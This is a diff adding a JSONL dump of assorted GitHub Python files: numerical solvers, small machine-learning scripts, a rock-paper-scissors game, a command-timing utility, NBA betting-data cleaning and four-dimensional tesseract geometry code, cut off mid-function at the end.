diff --git "a/3347.jsonl" "b/3347.jsonl" new file mode 100644--- /dev/null +++ "b/3347.jsonl" @@ -0,0 +1,1523 @@ +{"seq_id":"30745756926","text":"import os\r\nimport csv\r\nimport numpy as np\r\nimport scipy as sp\r\nfrom scipy.integrate import odeint\r\nfrom scipy.optimize import curve_fit\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#RungeKutta4\r\ndef RK4(x,y,z,h,range,f1,f2):\r\n X=[]\r\n Y=[]\r\n while x <= range:\r\n k1= h*f1(z)\r\n l1= h*f2(x,y,z)\r\n\r\n k2= h*f1(z+l1/2)\r\n l2= h*f2(x+h/2,y+k1/2, z+l1/2)\r\n\r\n k3= h*f1(z + l2 / 2)\r\n l3= h*f2(x + h / 2, y + k2 / 2, z + l2 / 2)\r\n\r\n k4= h*f1(z + l3)\r\n l4= h*f2(x + h, y + k3, z + l3)\r\n\r\n y= y+1/6*(k1 +2*k2 +2*k3 +k4)\r\n z= z+1/6*(l1 +2*l2 +2*l3 +l4)\r\n x= x+h\r\n\r\n\r\n X.append(x)\r\n Y.append(y)\r\n return X,Y\r\n","repo_name":"Soumik77777/OpenLab_P441_442_2021","sub_path":"Exp1_Gravity_driven_oscillation/rk4.py","file_name":"rk4.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21942468493","text":"import numpy as np\nfrom numpy.linalg import inv\n\ndef mu(beta, X):\n return 1.0 / (1.0 + np.exp(-X.dot(beta)))\n\ndef diag(mu):\n return np.diag(np.ndarray.flatten(np.multiply(mu, 1.0 - mu)))\n\ndef update(beta, mu_B, X, Y, lamb):\n I = np.eye(beta.size)\n hessian_inv = inv(2*lamb*I + X.T.dot(diag(mu_B)).dot(X))\n gradient = 2*lamb * I.dot(beta) - X.T.dot(Y - mu_B)\n return beta - hessian_inv.dot(gradient)\n\nif __name__ == \"__main__\":\n X = np.array([[0, 3, 1], [1, 3, 1], [0, 1, 1], [1, 1, 1]]) # 4 x 3\n Y = np.array([[1], [1], [0], [0]]) # 4 x 1\n B0 = np.array([[-2], [1], [0]]) # 3 x 1\n LAMBDA = 0.07\n mu0 = mu(B0, X)\n B1 = update(B0, mu0, X, Y, LAMBDA)\n mu1 = mu(B1, X)\n B2 = update(B1, mu1, X, Y, LAMBDA)\n print(\"\\nmu_0:\\n\")\n print(mu0)\n print(\"\\nbeta_1:\\n\")\n print(B1)\n print(\"\\nmu_1:\\n\")\n print(mu1)\n print(\"\\nbeta_2:\\n\")\n print(B2)\n","repo_name":"mkjois/edu","sub_path":"cs189/hw4/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"926130462","text":"import re\nvalue = input()\nn1 = '\\n' #Variável para usaliza \\n na f-string\nc = '[qwrtypsdfghjklzxcvbnm]'\nm = re.findall(r'(?<='+ c +')([aeiou]{2,})'+ c, value, re.I)\n#re.I serve pra utlizar letrar maiúsculas e minúsculas\n\nprint('\\n'.join(m or ['-1']))\n\n\n# import re\n# value = input()\n# c = '[qwrtypsdfghjklzxcvbnm]'\n# x = r'(?<='+ c +')([aeiouAEIOU]{2,})'+ c\n# d = re.compile(x)\n# m = d.findall(value)\n\n# print(f\"{n1.join(m or ['-1'])}\")\n#f-string não aceita \\\n","repo_name":"AntonioBretas/hackerank-training","sub_path":"Exercício/findallfinditer.py","file_name":"findallfinditer.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32601093061","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 9 12:49:11 2021\r\n\r\n@author: Irfan Sheikh\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport tensorflow as tf\r\ntf.__version__\r\n\r\ndf=pd.read_excel(\"D:\\Data Science\\Deep Learning\\Deep Learning Practice\\ANN\\\\Folds5x2_pp.xlsx\")\r\n \r\nX=df.iloc[:,:-1].values\r\nY=df.iloc[:,-1].values\r\n\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train,X_test,Y_train,Y_test=train_test_split(X,Y,test_size=0.2,random_state=0)\r\n\r\n\r\n#Initializing ANN#\r\n\r\nann=tf.keras.models.Sequential()\r\n\r\n#Adding Input layer and first hidden layer#\r\n\r\nann.add(tf.keras.layers.Dense(units=6,activation=\"relu\"))\r\n\r\n#Adding Second hidden layer#\r\nann.add(tf.keras.layers.Dense(units=6,activation=\"relu\"))\r\n\r\n#Adding outpu layer#\r\nann.add(tf.keras.layers.Dense(units=1))\r\n\r\n#Compiling ANN#\r\nann.compile(optimizer=\"adam\",loss=\"mean_squared_error\")\r\n\r\n#Training ANN \r\n\r\nann.fit(X_train,Y_train,batch_size=32,epochs=100)\r\n\r\n#Predicting on test data#\r\n\r\ny_pred=ann.predict(X_test)\r\nnp.set_printoptions(precision=2)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1),Y_test.reshape(len(Y_test),1)),1))\r\n","repo_name":"Irfan-S-1/Deep-Learning","sub_path":"ann_regression.py","file_name":"ann_regression.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37008173769","text":"import pickle\nimport os\nimport glob\nimport sys\nfrom cleaningFunctions import full2abv\n# with open('box_team_results_cleaned.pkl','rb') as handle:\n# full_results = pickle.load(handle)\nfrom collections import defaultdict\n\nmain_path = '/Users/MarkJaj/Documents/github/bbrefpy/BoxScores/BoxScores/spiders/line_pickles'\ndef getYear(s):\n year = s[:4]\n month = s[4:6]\n day = s[-2:]\n if int(month)<6:\n return str(int(year)-1)\n return year\n\n\n# results = defaultdict(dic2\n\n# for f in full_results:\n# results[getYear(f)][f] = full_results[f]\ndef organizeAllBets(linepath):\n lines = {}\n matchups = {}\n game_ids = defaultdict(list)\n get_year = lambda year,month: year if month in ['08','09','10','11','12'] else str(int(year)-1)\n for p in glob.glob(linepath+'/*.pkl'):\n with open(p,'rb') as handle:\n full = pickle.load(handle)\n year = p.split('/')[-1]\n year,month = year[4:8],year[8:-4]\n m = month if len(month)==2 else '0'+month\n bb_year = get_year(year,m)\n for f in full:\n if not all(f):continue\n h,a = f[1][0],f[2][0]\n d = f[0]\n gid = year+m+d+'0'+full2abv[h]\n gid = gid if gid[-3:]!='CHO' else gid[:-3]+'CHA'\n lines[gid] = f\n matchups[gid] = (h,a)\n game_ids[bb_year].append(gid)\n\n return game_ids,lines,matchups\n\n\ndef cleanBetsForYear(cYear):\n\n game_ids = {str(cYear):[],str(cYear+1):[]} \n lines = {}\n for p in glob.glob(main_path+'/*.pkl'):\n with open(p,'rb') as handle:\n full = pickle.load(handle)\n year = p.split('/')[-1]\n year,month = year[4:8],year[8:-4]\n m = month\n if (year ==str(cYear)):\n for f in full:\n # print(f)\n if not all(f):\n continue\n h,a = f[1][0],f[2][0]\n d = f[0]\n if int(m)<7:\n year = str(cYear+1)\n gid = year+m+d+'0'+full2abv[h]\n gid = gid if gid[-3:]!='CHO' else gid[:-3]+'CHA'\n addD = lambda x: x if len(x) == 12 else x[:4] + '0' + x[4:]\n\n lines[addD(gid)] = f\n game_ids[year].append(gid)\n return game_ids,lines\n\n\n\ndef combineData(bbdata,game_ids,lines,goal_year):\n '''\n bettings lines have incorrect dates, but correct order\n use the structure of bbreff data to organize nowgoal data\n '''\n bet_lines = {}\n current = '00'\n prev_games = []\n i = 0\n err = []\n for g in zip(sorted(bbdata),(game_ids[str(goal_year)]+game_ids[str(goal_year+1)])):\n # print(g)\n # print(i, g)\n i+=1\n if g[0][-6:-4] != current: # if bb day different than current day (chould change 1st)\n current = g[0][-6:-4]\n # try:\n tofix = {x[1][-3:]:x[1] for x in prev_games}\n fixed = {x[0]:tofix[x[0][-3:]] for x in prev_games}\n for c in fixed:\n bet_lines[c] = lines[fixed[c]]\n\n prev_games = [g]\n continue\n prev_games.append(g)\n return bet_lines\n\n\ndef clean2015(res_2015,bet_lines):\n '''\n hardcode in last set of games for 2015:2016 season\n NEED TO FIX SO IT DOESNT NEED THIS\n '''\n for g in sorted(bet_lines):\n bet_lines[g] = bet_lines[g][-4:]\n notworking = [x.upper() for x in 'dal hou cho mil min was bos brk cle chi lal pho por gsw'.split(' ')]\n ans = ['5 187.5 52-34','15 220 64-44','7.5 211 66-50','4.5 201.5 46-62',\n '10 212.5 72-50','-9 210 57-59','4.5 206 38-62','-5.5 206.5 47-49','4 194 44-58',\n '9.5 210 51-60','-3.5 196 42-57','5 205.5 62-55','10 217 58-56','17.5 212.5 70-50']\n scores = '91-96 116-81 117-103 92-97 144-109 109-98 98-88 96-103 110-112 115-105 101-96 114-105 107-99 125-104'.split(' ')\n fix = dict(zip(notworking,zip(scores,[x.split(' ') for x in ans])))\n\n for g in sorted(res_2015)[1216:1230]:\n a = fix[g[-3:]]\n bet_lines[g] = [a[0].split('-')] + [[x] for x in a[1] ]\n\n\n for b in sorted(bet_lines):\n bet_lines[b] = [x[0] for x in bet_lines[b][1:]]\n return bet_lines\n\n\ndef clean2014(res_2014,bet_lines):\n '''\n hardcode in last set of games for 2014:2015 season\n '''\n\n for g in sorted(bet_lines):\n bet_lines[g] = bet_lines[g][-4:]\n notworking = [x.upper() for x in 'tor nyk chi brk cle hou nop dal min mil phi mem lal gsw'.split(' ')]\n ans = ['92-87 10.5 194','90-112 -9 193','91-85 5 197.5','101-88 9 203.5','113-108 8 192',\n '117-91 11.5 193.5','108-103 -5.5 193','114-98 6 208.5','113-138 -14 211',\n '100-105 6 198','101-105 2 192','95-83 -2 184.5','99-122 3 206.5','133-126 11.5 215.5']\n fix = dict(zip(notworking,ans))\n for g in sorted(res_2014)[1216:1230]:\n a = fix[g[-3:]].split(\" \")\n bet_lines[g] = [a[0].split('-'),[a[1]],[a[2]]]\n for b in sorted(bet_lines):\n bet_lines[b] = [bet_lines[b][0][0],bet_lines[b][0][1],bet_lines[b][1][0],bet_lines[b][2][0]]\n # print(b)\n return bet_lines\ndef clean2013(res_2013,bet_lines):\n\n for g in sorted(bet_lines):\n bet_lines[g] = bet_lines[g][-4:]\n teamnames = 'brk lac bos cha cle den mem mia mil min nop nyk okc orl por sac sas'\n teamnames = 'dal hou cha mil min was bos brk cle chi lal pho por gsw'\n teamnames = 'bos cha cle den mem mia mil min nop nyk okc orl por sac sas'\n teamnames = 'orl cha min nop nyk sas cle okc mia bos mil mem por den sac'\n notworking = [x.upper() for x in teamnames.split(' ')]\n ans = ['86-101 3.5 187','91-86 1.5 180.5','130-136 11.5 210.5','105-100 3 208.5','95-92 -6 198.5',\n '100-113 9 217','114-85 8 198','112-111 14.5 212.5','87-100 5.5 208','102-118 -8 197.5','103-111 3 205',\n '106-105 3 190.5','110-104 3 207','112-116 8 209.5','99-104 -2.5 208']\n fix = dict(zip(notworking,ans))\n for g in sorted(res_2013)[1215:1230]: \n a = fix[g[-3:]].split(\" \")\n bet_lines[g] = [a[0].split('-'),[a[1]],[a[2]]]\n for b in sorted(bet_lines):\n bet_lines[b] = [bet_lines[b][0][0],bet_lines[b][0][1],bet_lines[b][1][0],bet_lines[b][2][0]]\n \n return bet_lines\ndef run2013(year = 2013):\n with open('results_by_year.pkl','rb') as handle:\n res_f = pickle.load(handle)\n res_20x = res_f[str(year)]\n goal_year = year\n game_ids,lines = cleanBetsForYear(goal_year)\n res_20x = [x for x in res_20x if (x[:4]==str(year) and int(x[4:6])>7) or (x[:4]==str(year+1)and int(x[4:5]) <7)]\n\n addD = lambda x: x if len(x)==12 else x[:4]+'0'+x[4:]\n res_20x = [addD(x) for x in res_20x]\n\n\n # res_20x = [ x if x[-3:]!='CHA' else x[:-3]+'CHO']\n game_ids[str(year)] = [addD(x) for x in game_ids[str(year)]]\n game_ids[str(year+1)] = [addD(x) for x in game_ids[str(year+1)]]\n\n game_ids[str(year)] = [x if x[-3:]!='CHO' else x[:-3]+'CHA' for x in game_ids[str(year)] ]\n game_ids[str(year+1)] = [x if x[-3:]!='CHO' else x[:-3]+'CHA' for x in game_ids[str(year+1)] ]\n bet_lines = combineData(res_20x,game_ids,lines,goal_year)\n print(len(bet_lines))\n sol2013 = clean2013(res_20x,bet_lines)\n # print( sorted(res_20x)[1215:1230])\n\ndef combineData2(bbdata,game_ids,lines):\n '''\n bettings lines have incorrect dates, but correct order\n use the structure of bbreff data to organize nowgoal data\n '''\n bet_lines = {}\n current = '00'\n prev_games = []\n i = 0\n err = []\n for g in zip(sorted(bbdata),game_ids):\n\n i+=1\n if g[0][-6:-4] != current: # if bb day different than current day (chould change 1st)\n current = g[0][-6:-4]\n # try:\n tofix = {x[1][-3:]:x[1] for x in prev_games}\n print(\"TOFIX: \",tofix)\n print(\"PREV: \",prev_games)\n print(i)\n fixed = {x[0]:tofix[x[0][-3:]] for x in prev_games}\n print(\"FIXED: {0}\".format(fixed),i)\n for c in fixed:\n if c[-3:]=='NOH':\n bet_lines[c] = lines[fixed[c][:-3]+'NOP']\n else:\n bet_lines[c] = lines[fixed[c]]\n\n prev_games = [g]\n continue\n prev_games.append(g)\n return bet_lines\n\ndef groupBy3(lst):\n out = defaultdict(list)\n for game in lst:\n out[game[-3:]].append(game)\n return out\ndef connectList(ls1,ls2):\n \"\"\"\n Assuming games by each team,last 3 chars of list, appear in order.\n give dicts to go from one list to another\n \"\"\"\n s1,s2 = groupBy3(ls1),groupBy3(ls2)\n bb2line = {}\n line2bb = {}\n for a in set([a for a in s1]+[b for b in s2]):\n # print(a)\n for i,j in zip(s1[a],s2[a]):\n # print('\\t',i,j)\n bb2line[i] = j\n line2bb[j] = i\n return bb2line,line2bb\n\n \ngames,lines,matchups = organizeAllBets('../Data/line_pickles2')\n\nwith open('../Data/Clean/TeamBoxByYear/results_2012.pkl','rb') as handle:\n res12 = pickle.load(handle)\n\n\nfor i in range(len(games['2012'])):\n team = games['2012'][i]\n if team[-3:]=='NOP':\n games['2012'][i] = team[:-3]+'NOH'\n\ndef removeDuplicatePreserveOrder(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\nbbD,lineD = connectList(sorted(res12),removeDuplicatePreserveOrder(games['2012']))\n\n\n# for g in zip(sorted(set(games['2012'])),sorted(lineD),sorted(res12)):\n# # print(game,lineD[game])\n# print(g)\nz = groupBy3(games['2012'])\nfor g in z:\n print(g,len(z[g]))\n i=0\n for game in sorted(z[g]):\n i+=1\n print('\\t',game,matchups[game])\n\n\n\n\n","repo_name":"jawjay/mj-beats-vegas","sub_path":"Cleaning/preProcess.py","file_name":"preProcess.py","file_ext":"py","file_size_in_byte":9613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40072164556","text":"import requests\nimport base64\nimport numpy as np\nfrom onnx import numpy_helper\nimport onnx\nfrom google.protobuf.json_format import MessageToJson\nimport json\nimport tools.data_util as data_util\nimport tools.defaults as defaults\n\ndef main():\n \"\"\"\n You need to run onnx runtime server on your localhost in advance.\n \"\"\"\n ENDPOINT = 'http://localhost:8001/v1/models/default/versions/1:predict'\n json_request_headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n }\n\n colors = defaults.COLORS\n for color in colors:\n input_array = data_util.get_transformed_array(color)\n tensor_proto = numpy_helper.from_array(input_array)\n json_str = MessageToJson(tensor_proto, use_integers_for_enums=True)\n data = json.loads(json_str)\n\n inputs = {}\n inputs['input_0'] = data\n output_filters = ['output_0']\n\n payload = {}\n payload[\"inputs\"] = inputs\n payload[\"outputFilter\"] = output_filters\n\n res = requests.post(ENDPOINT, headers=json_request_headers, data=json.dumps(payload))\n raw_data = json.loads(res.text)['outputs']['output_0']['rawData']\n outputs = np.frombuffer(base64.b64decode(raw_data), dtype=np.float32)\n pred = np.argmax(outputs)\n\n assert defaults.COLORS[pred] == color\n print(\"Great! Label = {}, Pred = {}.\".format(defaults.COLORS[pred], color))\n\nif __name__ == '__main__':\n main()","repo_name":"rskmoi/onnx-runtime-with-torch-example","sub_path":"04_onnxruntime_server_json.py","file_name":"04_onnxruntime_server_json.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"23483477944","text":"import random\r\nrock = '''\r\n _______\r\n---' ____)\r\n (_____)\r\n (_____)\r\n (____)\r\n---.__(___)\r\n'''\r\n\r\npaper = '''\r\n _______\r\n---' ____)____\r\n ______)\r\n _______)\r\n _______)\r\n---.__________)\r\n'''\r\n\r\nscissors = '''\r\n _______\r\n---' ____)____\r\n ______)\r\n __________)\r\n (____)\r\n---.__(___)\r\n'''\r\n\r\ndef cals(value):\r\n for your in range (0,len(value)):\r\n if value[your] == 0 and your == 0:\r\n print(\"You chosen Rock\"+rock)\r\n elif value[your] == 0 and your == 1:\r\n print(\"Computer chosen Rock\"+rock)\r\n elif value[your] == 1 and your == 0:\r\n print(\"You Chosen Paper\"+paper)\r\n elif value[your] == 1 and your == 1:\r\n print(\"Computer chosen Paper\"+paper)\r\n elif value[your] == 2 and your == 0:\r\n print(\"You Chosen Scissors\"+scissors)\r\n elif value[your] == 2 and your == 1:\r\n print(\"Computer chosen Scissors\"+scissors)\r\n else:\r\n print(f\"The Entered Number {your} is invalid\")\r\n\r\ndef result(value):\r\n if value[0]==value[1]:\r\n print(\"The Match is Draw\")\r\n elif value[0]==0 and value[1]==1 or value[0]==1 and value[1]==2 or value[0]==2 and value[1]==0:\r\n print(\"The computer wins the game and you lose\")\r\n print(\"\\n\\n\\n\\n\\nDon't Lose Your Hope\")\r\n elif value[0]==1 and value[1]==0 or value[0]==2 and value[1]==1 or value[0]==0 and value[1]==2:\r\n print(\"You wins the Game and the computer lose\")\r\n print(\"\\n\\n\\n\\n\\nKeep on Going\")\r\n\r\nprint(f\"ROCK: {rock}\\n PAPER: {paper}\\n SCISSORS: {scissors}\")\r\nyours = input(\"What do you choose ?\\nPress 0 for Rock,1 for Paper or 2 for Scissors\\n\")\r\ncomp_choice = random.randint(0,2)\r\nvalue =[int(yours),comp_choice]\r\ncals(value)\r\nresult(value)","repo_name":"SakthiCa/Python-Projects","sub_path":"Mini Projects/rock_paper_Scissor.py","file_name":"rock_paper_Scissor.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"19941571172","text":"\"\"\" pytest configuration \"\"\"\nimport os\nimport sys\nimport time\nimport json\nfrom argparse import Namespace\nimport pytest\n\ndef pytest_addoption(parser):\n \"\"\"Add command line options\"\"\"\n parser.addoption(\"--lmenv\",\n action=\"store\",\n required=True,\n help=\"Path to .lmenv file\")\n\ndef pytest_configure(config):\n \"\"\"Configure pytest\"\"\"\n # Read .lmeenv file\n lmenv_path = config.getoption(\"--lmenv\")\n with open(lmenv_path) as f:\n config = json.load(f)\n\n # Add root directory and binary directory to sys.path\n if config['path'] not in sys.path:\n sys.path.insert(0, config['path'])\n if config['bin_path'] not in sys.path:\n sys.path.insert(0, config['bin_path'])\n\n # Make lmenv accessible from the test code\n pytest.lmenv = Namespace(**config)\n","repo_name":"lightmetrica/lightmetrica-v3","sub_path":"pytest/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"5"} +{"seq_id":"18114654987","text":"import numpy as np\nimport scipy \n\nclass Trapezoid:\n def __init__(self, x1, x2, yl, ymid, yr):\n self.x1 = x1\n self.x2 = x2\n self.yl = yl\n self.ymid = ymid\n self.yr = yr\n\n def calc(self, x: float) -> float:\n if x < self.x1:\n return self.ymid + (x - self.x1) * (self.ymid - self.yl) / (self.x1 + 100)\n elif x > self.x2:\n return self.ymid + (x - self.x2) * (self.yr - self.ymid) / (100 - self.x2)\n else:\n return self.ymid\n\ndef learn_trapezoid(xs, ys, yerrs):\n xs = np.array(xs)\n ys = np.array(ys)\n assert(len(xs) == len(ys))\n x0 = [-75, 75, -50, -5, -50]\n\n def helper(x):\n trap = Trapezoid(*x)\n\n errs = [(ys[i] - trap.calc(xs[i])) for i in range(len(xs))]\n retval = np.square(errs).sum()\n\n too_far_penalty = 0\n too_far_penalty += max(0, -x[0] - 90)*100\n too_far_penalty += max(0, x[1] - 90)*100\n return retval + too_far_penalty\n\n return Trapezoid(*scipy.optimize.minimize(helper, x0, tol=1e-10).x)","repo_name":"kobortor/BerkeleyAlgo","sub_path":"trapezoid.py","file_name":"trapezoid.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7408769717","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nimport time\nimport sys\nimport random\n\ndef parse_args():\n p = argparse.ArgumentParser()\n p.add_argument(\"--times\", type=int, default=10)\n p.add_argument(\"command\", nargs='*')\n return p.parse_args()\n\ndef bootstrap(data, times=1000, interval=0.95):\n samples = []\n ldata = len(data)\n for _ in range(times):\n sampled = []\n for num in range(ldata):\n sampled.append(data[random.randrange(ldata)])\n samples.append(sum(sampled) / ldata)\n samples.sort()\n remain = (1.0 - interval) / 2\n bot_idx = int(times * remain)\n top_idx = int(times * (1.0 - remain))\n return samples[bot_idx], samples[top_idx]\n\n\n\ndef execute(command, nrun, total):\n start = time.monotonic()\n rcode = subprocess.call(command)\n end = time.monotonic()\n dur = end - start\n cmdstring = \" \".join(command)\n if len(cmdstring) > 23:\n cmdstring = cmdstring[:20] + \"...\"\n print(f\"{rcode} <- [{dur:.2F}s] ({nrun + 1}/{total}) {cmdstring}\", file=sys.stderr)\n return dur\n\ndef main(args):\n times = []\n for i in range(args.times):\n exec_time = execute(args.command, i, args.times)\n times.append(exec_time)\n\n times.sort()\n\n avg_time = sum(times) / len(times)\n all_times_str = \",\".join(format(x, \".2F\") for x in times)\n time_ci_bot, time_ci_top = bootstrap(times)\n print(f\"{avg_time:.2F} ({time_ci_bot:.2F}, {time_ci_top:.2F})\\t{all_times_str}\\n\")\n\n\n\nif __name__ == \"__main__\":\n main(parse_args())","repo_name":"eiennohito/xtime","sub_path":"xtime.py","file_name":"xtime.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22912294198","text":"import numpy as np\nfrom pyray.shapes.fourd.tesseract_graph import TsrctFcGraph\nimport pyray.shapes.solid.open_cube as oc\nfrom pyray.rotation2.rotn_4d import rotate_points_about_plane\nfrom copy import deepcopy\nfrom PIL import Image, ImageDraw\nfrom pyray.rotation import rotation, axis_rotation\nfrom pyray.rotation2.rotn_4d import rotate_points_about_plane_helper\nfrom pyray.shapes.fourd.tesseract_graph import Face1\nimport queue\n\n\nclass TsrctCube(TsrctFcGraph):\n def __init__(self, key='000+', rot_sign=1) -> None:\n super().__init__()\n self.color = \"white\"\n self.key = key\n self.faces = {}\n self.rot_sign = rot_sign\n for i in range(len(key)):\n ch = key[i]\n if ch == '0':\n for ch1 in ['+', '-']:\n str1 = ''\n for j in range(len(key)):\n if j != i:\n str1 = str1 + key[j]\n else:\n str1 = str1 + ch1\n self.faces[str1] = deepcopy(self.vert_props[str1])\n\n self.cube_center = []\n for ch in self.key:\n if ch == '0':\n self.cube_center.append(0)\n elif ch == '+':\n self.cube_center.append(1)\n else:\n self.cube_center.append(-1)\n self.cube_center = np.array(self.cube_center)\n self.o_cube_center = deepcopy(self.cube_center)\n\n def get_common_face(self, other_key='000+'):\n return get_common_face(self.key, other_key)\n \n def plot_perspective(self, draw, r, persp=5, rgba=(123, 22, 10, 40),\n shift=np.array([256, 256, 0, 0]),\n scale=35):\n for f in self.faces.keys():\n self.faces[f].plot_perspective(draw, r, e=persp, c=-persp, \n rgba=rgba, shift=shift, scale=scale)\n\n def rotate(self, ax1, ax2, ax3, theta, ref_pt=None, take_further=True):\n for ff in self.faces.keys():\n self.faces[ff].rotate_about_plane(ax1, ax2, ax3, theta)\n # if self.rot_sign != 0:\n # self.faces[ff].rotate_about_plane(ax1, ax2, ax3, theta*self.rot_sign)\n # elif ss != 0:\n # self.faces[ff].rotate_about_plane(ax1, ax2, ax3, theta*ss)\n # else:\n # self.faces[ff].rotate_about_plane(ax1, ax2, ax3, theta,\n # ref_pt, \n # take_farther=take_further)\n\n def reset(self):\n for fc in self.faces.keys():\n self.faces[fc].reset()\n\n\nclass TsrctCubeTree(TsrctFcGraph):\n def __init__(self, free_rot=False, take_further=True) -> None:\n super().__init__()\n self.max_depth = 0\n self.face_map = self.vert_props\n self.cubes = {'000+':0, '000-':1,\n '00+0':2, '00-0':3,\n '0+00':4, '0-00':5,\n '+000':6, '-000':7}\n self.cube_map = {}\n for k in self.cubes.keys():\n self.cube_map[k] = TsrctCube(k)\n # Legacy methods still use vert_props.\n self.vert_props = self.cube_map\n self.adj = {\n '000-': ['00-0','+000','0-00','-000','0+00','00+0'],\n '00-0': ['000+']\n }\n self.black_verts = set()\n self.grey_verts = set()\n self.cube_arr = []\n self.rot_arr = []\n self.theta = np.pi/20.0\n self.free_rot = free_rot\n self.take_further = take_further\n\n def plot(self, draw, r, persp=5, rgba=(123, 22, 10, 40),\n shift=np.array([256, 256, 0, 0]),\n scale=35):\n for c1 in self.cube_map.keys():\n self.cube_map[c1].plot_perspective(draw, r, persp\n , rgba=rgba,\n shift=shift,\n scale=scale)\n\n def dfs_flatten(self, u):\n self.cube_map[u].color = \"grey\"\n self.grey_verts.add(u)\n u_cube = self.cube_map[u]\n for i in range(len(self.cube_arr)):\n cc = self.cube_arr[i]\n cu = self.cube_map[cc]\n pi_name = self.cube_map[cu.key].pi\n pi = self.cube_map[pi_name]\n if cc not in self.black_verts and cc in self.grey_verts:\n rot1 = self.rot_arr[i]\n if self.free_rot:\n rot1.do_rotate(u_cube, theta=self.theta)\n else:\n rot1.do_rotate(u_cube, theta=self.theta,\n ref_pt=pi.cube_center,\n take_further=self.take_further)\n\n if u in self.adj:\n for v in self.adj[u]:\n if self.cube_map[v].color == \"white\":\n # Apply rotations of grey vertices.\n self.cube_arr.append(v)\n c0 = self.cube_map[u]\n c1 = self.cube_map[v]\n sign = self.cube_map[v].rot_sign\n rot1 = Rotation(c0, c1, sign)\n self.rot_arr.append(rot1)\n self.dfs_flatten(v)\n self.cube_map[u].color = \"black\"\n self.black_verts.add(u)\n\n def bfs(self, s):\n #self.grey_verts.add(s)\n self.cube_map[s].color = \"grey\"\n self.cube_map[s].d = 0\n q = queue.Queue()\n q.put(s)\n while q.qsize() > 0:\n u = q.get()\n if u in self.adj:\n for v in self.adj[u]:\n if self.cube_map[v].color == \"white\":\n self.cube_map[v].color = \"grey\"\n self.cube_map[v].d = self.cube_map[u].d + 1\n if self.max_depth < self.cube_map[v].d:\n self.max_depth = self.cube_map[v].d\n self.cube_map[v].pi = u\n self.cube_map[v].rot_sign = get_rot_sign(u, v)\n q.put(v)\n self.cube_map[u].color = \"black\"\n self.black_verts.add(u)\n\n def reset(self):\n for cu in self.cube_map.keys():\n self.cube_map[cu].reset()\n\n\ndef get_rot_sign(u, v):\n fc1 = get_common_face(u, v)\n face1 = Face1(fc1)\n cu = TsrctCube(u)\n cv = TsrctCube(v)\n pt1 = deepcopy(cv.cube_center)\n pts2 = rotate_points_about_plane_helper(np.array([pt1]), \n face1.vertices[0], \n face1.vertices[1], \n face1.vertices[2],\n np.random.normal(size=4),\n np.pi/2)\n if sum((pts2[0] - cu.cube_center)**2) < 1:\n return -1\n return 1\n\n\nclass Rotation():\n def __init__(self, c0, c1, sign=1):\n self.c0 = c0\n self.c1 = c1\n self.sign = sign\n f1 = get_common_face(c0.key, c1.key)\n fc1 = c0.faces[f1]\n self.ax1, self.ax2, self.ax3 = \\\n fc1.vertices[0], fc1.vertices[1],\\\n fc1.vertices[2]\n #self.ref_pt = c0.cube_center\n self.ref_pt = np.array([0,0,0,0])\n\n def do_rotate(self, c1, theta=np.pi*3/200.0, ref_pt=None, \n take_further=True):\n # c1.rotate(self.ax1, self.ax2, self.ax3, \\\n # theta, ref_pt=ref_pt, take_further=take_further)\n c1.rotate(self.ax1, self.ax2, self.ax3, \\\n theta*self.sign)\n\n\nclass MshObj():\n def __init__(self, tt, r, scale, shift, persp):\n self.tt = tt\n self.r = r\n self.scale = scale\n self.shift = shift\n self.persp = persp\n \n def plot(self, draw, rgba=(100,100,100,40)):\n self.tt.plot(draw, self.r, rgba=rgba,\n shift=self.shift,\n scale=self.scale,\n persp=self.persp)\n\n\ndef get_common_face(f1='000+', f2='00-0'):\n res = []\n for i in range(len(f1)):\n if f1[i] != '0':\n res.append(f1[i])\n elif f2[i] != '0':\n res.append(f2[i])\n else:\n res.append('0')\n return ''.join(res)\n\n\ndef primitive_tsrct_open(persp=0, i=0, r=rotation(4, np.pi*17/60.0), theta=np.pi/20.0):\n \"\"\"\n Primitive way to open a cube.\n \"\"\"\n im = Image.new(\"RGB\", (512, 512), (0, 0, 0))\n draw = ImageDraw.Draw(im, 'RGBA')\n tf = TsrctCubeTree()\n c0 = tf.cube_map['000-']\n c1 = tf.cube_map['-000']\n c2 = tf.cube_map['+000']\n c3 = tf.cube_map['0+00']\n c4 = tf.cube_map['0-00']\n c5 = tf.cube_map['00+0']\n c6 = tf.cube_map['00-0']\n c7 = tf.cube_map['000+']\n #\n f1 = get_common_face(c0.key, c1.key)\n fc1 = c0.faces[f1]\n ax1, ax2, ax3 = fc1.vertices[0], fc1.vertices[1], fc1.vertices[2]\n 